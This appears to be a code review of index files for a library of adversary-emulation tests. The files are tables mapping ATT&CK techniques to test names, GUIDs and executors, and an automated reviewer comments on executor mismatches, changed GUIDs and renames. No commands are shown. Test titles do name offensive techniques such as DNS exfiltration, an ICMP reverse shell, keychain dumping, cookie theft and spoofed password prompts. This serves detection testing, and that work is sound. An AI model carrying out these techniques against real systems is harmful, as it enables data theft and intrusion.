2093 impact T1529 System Shutdown/Reboot 15 ESXi - vim-cmd Used to Power Off VMs 622cc1a0-45e7-428c-aed7-c96dd605fbe6 command_prompt
2094 initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
2095 initial-access T1566.002 Phishing: Spearphishing Link 1 Paste and run technique bc177ef9-6a12-4ebc-a2ec-d41e19c2791d powershell
2096 initial-access T1566.001 Phishing: Spearphishing Attachment 1 Download Macro-Enabled Phishing Attachment 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
2127 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
2128 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
2129 exfiltration T1048 Exfiltration Over Alternative Protocol 3 DNSExfiltration (doh) c943d285-ada3-45ca-b3aa-7cd6500c6a48 powershell
2130 exfiltration T1048 Exfiltration Over Alternative Protocol 4 Exfiltrate Data using DNS Queries via dig a27916da-05f2-4316-a3ee-feec67a437be bash
2131 exfiltration T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites 1 Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows) c2e8ab6e-431e-460a-a2aa-3bc6a32022e3 powershell
2132 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 1 Exfiltrate data with rclone to cloud Storage - Mega (Windows) 8529ee44-279a-4a19-80bf-b846a40dda58 powershell
2133 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 2 Exfiltrate data with rclone to cloud Storage - AWS S3 a4b74723-5cee-4300-91c3-5e34166909b4 powershell
2134 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
2135 exfiltration T1030 Data Transfer Size Limits 2 Network-Based Data Transfer in Small Chunks f0287b58-f4bc-40f6-87eb-692e126e7f8f powershell
2136 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
+10 -2
@@ -191,8 +191,11 @@ persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),
persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1095,Non-Application Layer Protocol,4,Linux ICMP Reverse Shell using icmp-cnc,8e139e1f-1f3a-4be7-901d-afae9738c064,manual
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,sh
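Review bot: the two new T1572 rows declare different executors for what look like parallel Linux/macOS tests: `Microsoft Dev tunnels (Linux/macOS)` is listed as `bash` while `VSCode tunnels (Linux/macOS)` is `sh`. If both scripts only need POSIX sh, use `sh` for both; if the Dev tunnels test really depends on bash features, keep `bash` but confirm the executor declared for that test at its source matches, since a mismatch here lists the test under the wrong shell and a runner that honours this index will invoke it with the wrong interpreter.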
@@ -226,7 +229,6 @@ collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing d
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (FreeBSD/Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,sh
lateral-movement,T1021.004,Remote Services: SSH,1,ESXi - Enable SSH via PowerCLI,8f6c14d1-f13d-4616-b7fc-98cc69fe56ec,powershell
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
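Review bot: the removed row (`ESXi - Enable SSH via PowerCLI`, executor `powershell`) was the only `powershell` entry among the `sh`/`bash` rows shown here, so dropping it from this index is consistent with the file's contents. The same change, however, adds another `powershell` row further down in this file (`Exfiltrate data with rclone to cloud Storage - AWS S3`, test 2 of T1567.002), so whatever platform or executor filter justifies this removal should be applied the same way to that addition.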
@@ -311,9 +313,12 @@ credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users
credential-access,T1552.004,Unsecured Credentials: Private Keys,8,Copy the users GnuPG directory with rsync (freebsd),b05ac39b-515f-48e9-88e9-2f141b5bcad0,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,2,Search Through sh History,d87d3b94-05b4-40f2-a80f-99864ffa6803,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,37807632-d3da-442e-8c2e-00f44928ff8f,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,3,SSH Credential Stuffing From FreeBSD,a790d50e-7ebf-48de-8daa-d9367e0911d4,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
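Review bot: test 1 `Find AWS credentials` under T1552.001 appears twice with the same test number but different GUIDs, `2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17` on the old line and `37807632-d3da-442e-8c2e-00f44928ff8f` on the new one. Test GUIDs are the stable identifier that callers and automation use to select a test, so if this is an intentional replacement of the test the GUID change should be called out in the change description; if the GUID was regenerated by accident, restore the original so existing references keep matching.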
@@ -382,6 +387,7 @@ discovery,T1018,Remote System Discovery,14,Remote System Discovery - netstat,d27
discovery,T1018,Remote System Discovery,15,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,12,Port Scan using nmap (Port range),0d5a2b03-3a26-45e4-96ae-89485b4d1f97,sh
discovery,T1124,System Time Discovery,3,System Time Discovery in FreeBSD/macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
@@ -442,6 +448,8 @@ exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Ove
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,4,Exfiltrate data as text over HTTPS using wget,8bec51da-7a6d-4346-b941-51eca448c4b0,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,2,Exfiltrate data with rclone to cloud Storage - AWS S3,a4b74723-5cee-4300-91c3-5e34166909b4,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
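Review bot: the added row `Exfiltrate data with rclone to cloud Storage - AWS S3` carries executor `powershell`, while every other row visible in this file is `sh`, `bash` or `manual`, and the earlier hunk in the same file removes the one `powershell` row it had (`ESXi - Enable SSH via PowerCLI`). Either `powershell` tests do not belong in this index, in which case this row should only appear in the Windows index, or the test's platform list at its source should be checked, since a Linux/macOS platform entry on a powershell-only test is the likely reason it was pulled in here.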
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
191 persistence T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
192 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
193 command-and-control T1132.001 Data Encoding: Standard Encoding 2 Base64 Encoded data (freebsd) 2d97c626-7652-449e-a986-b02d9051c298 sh
194 command-and-control T1572 Protocol Tunneling 5 Microsoft Dev tunnels (Linux/macOS) 9f94a112-1ce2-464d-a63b-83c1f465f801 bash
195 command-and-control T1572 Protocol Tunneling 6 VSCode tunnels (Linux/macOS) b877943f-0377-44f4-8477-f79db7f07c4d sh
196 command-and-control T1090.003 Proxy: Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu/FreeBSD 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
197 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
198 command-and-control T1095 Non-Application Layer Protocol 4 Linux ICMP Reverse Shell using icmp-cnc 8e139e1f-1f3a-4be7-901d-afae9738c064 manual
199 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
200 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 sh
201 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f sh
229 collection T1560.002 Archive Collected Data: Archive via Library 2 Compressing data using bz2 in Python (FreeBSD/Linux) c75612b2-9de0-4d7c-879c-10d7b077072d sh
230 collection T1560.002 Archive Collected Data: Archive via Library 3 Compressing data using zipfile in Python (FreeBSD/Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 sh
231 collection T1560.002 Archive Collected Data: Archive via Library 4 Compressing data using tarfile in Python (FreeBSD/Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db sh
lateral-movement T1021.004 Remote Services: SSH 1 ESXi - Enable SSH via PowerCLI 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec powershell
232 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
233 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Sudo usage (freebsd) 2bf9a018-4664-438a-b435-cc6f8c6f71b1 sh
234 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
313 credential-access T1552.004 Unsecured Credentials: Private Keys 8 Copy the users GnuPG directory with rsync (freebsd) b05ac39b-515f-48e9-88e9-2f141b5bcad0 sh
314 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
315 credential-access T1552.003 Unsecured Credentials: Bash History 2 Search Through sh History d87d3b94-05b4-40f2-a80f-99864ffa6803 sh
316 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Find AWS credentials 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 37807632-d3da-442e-8c2e-00f44928ff8f sh
317 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
318 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
319 credential-access T1552.001 Unsecured Credentials: Credentials In Files 15 Find Azure credentials a8f6148d-478a-4f43-bc62-5efee9f931a4 sh
320 credential-access T1552.001 Unsecured Credentials: Credentials In Files 16 Find GCP credentials aa12eb29-2dbb-414e-8b20-33d34af93543 sh
321 credential-access T1552.001 Unsecured Credentials: Credentials In Files 17 Find OCI credentials 9d9c22c9-fa97-4008-a204-478cf68c40af sh
322 credential-access T1110.004 Brute Force: Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
+20 -5
@@ -14,7 +14,10 @@ defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Cachi
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",3,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",4,Truncate system log files via truncate utility,6290f8a8-8ee9-4661-b9cf-390031bf6973,sh
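Review bot: the test-4 rename in the T1497.001 rows, from `Detect Virtualization Environment (MacOS)` to `Detect Virtualization Environment via ioreg`, keeps GUID a960185f-aef6-4547-8350-d1ce16680d09, so consumers keyed on the GUID are unaffected, but anything matching on the old test name will stop matching; the new name follows sibling rows 6 and 8, which name the mechanism (sysctl, system_profiler) rather than the platform. The same rename and the new tests 6-8 appear again in the discovery section of this file, and the two listings must stay in sync.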
@@ -94,7 +97,6 @@ persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1543.004,Create or Modify System Process: Launch Daemon,2,Launch Daemon - Users Directory,6f899f9d-8a8e-4143-89a5-26fc2c3ec438,bash
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
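Review bot: the -94,7 +97,6 header shows one row removed from this persistence block; if that is `Launch Daemon - Users Directory` (6f899f9d-8a8e-4143-89a5-26fc2c3ec438), the same GUID is also listed under privilege-escalation, and the -156,7 +161,6 hunk further down removes one row there as well, so both tactic listings stay consistent. Check that nothing else in the repository still references that GUID.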
@@ -122,6 +124,8 @@ persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with
persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
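Review bot: the two new T1572 rows are both labelled `(Linux/macOS)` but carry different executors, `bash` for test 5 `Microsoft Dev tunnels` and `sh` for test 6 `VSCode tunnels`; unless test 5 relies on a bash-only feature, `sh` is the better choice, matching the surrounding command-and-control rows, since the executor column advertises the minimum shell a test needs.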
@@ -146,6 +150,7 @@ collection,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-
collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1005,Data from Local System,3,Copy Apple Notes database files using AppleScript,cfb6d400-a269-4c06-a347-6d88d584d5f7,sh
collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spoofing a credential prompt using osascript,b7037b89-947a-427a-ba29-e7e9f09bc045,bash
lateral-movement,T1021.005,Remote Services:VNC,1,Enable Apple Remote Desktop Agent,8a930abe-841c-4d4f-a877-72e9fe90b9ea,sh
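Review bot: the context line `Remote Services:VNC` (T1021.005) is missing the space after the colon that every other `Technique: Sub-technique` name in this file has; pre-existing, but a one-character fix worth making while this section is being edited.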
@@ -156,7 +161,6 @@ privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,2,Launch Daemon - Users Directory,6f899f9d-8a8e-4143-89a5-26fc2c3ec438,bash
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
@@ -187,9 +191,11 @@ privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root acco
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
credential-access,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain Dump,88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,2,Export Certificate Item(s),1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,3,Import Certificate Item(s) into Keychain,e544bbcb-c4e0-4bd0-b614-b92131635f59,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,4,Copy Keychain using cat utility,5c32102a-c508-49d3-978f-288f8a9f6617,sh
credential-access,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
credential-access,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
@@ -200,10 +206,13 @@ credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Priva
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,37807632-d3da-442e-8c2e-00f44928ff8f,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spoofing a credential prompt using osascript,b7037b89-947a-427a-ba29-e7e9f09bc045,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
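Review bot: the two `Find AWS credentials` rows (T1552.001 test 1) carry different GUIDs, 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 and 37807632-d3da-442e-8c2e-00f44928ff8f, so this hunk changes the GUID of an existing test in addition to adding tests 15-17 (Azure, GCP, OCI). Test GUIDs are the stable key consumers use to reference an atomic, so confirm the change is deliberate (for example, resolving a GUID shared with another test) and state the reason in the commit, because any playbook or detection mapping keyed on the old GUID will silently stop matching.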
@@ -214,7 +223,10 @@ discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
discovery,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
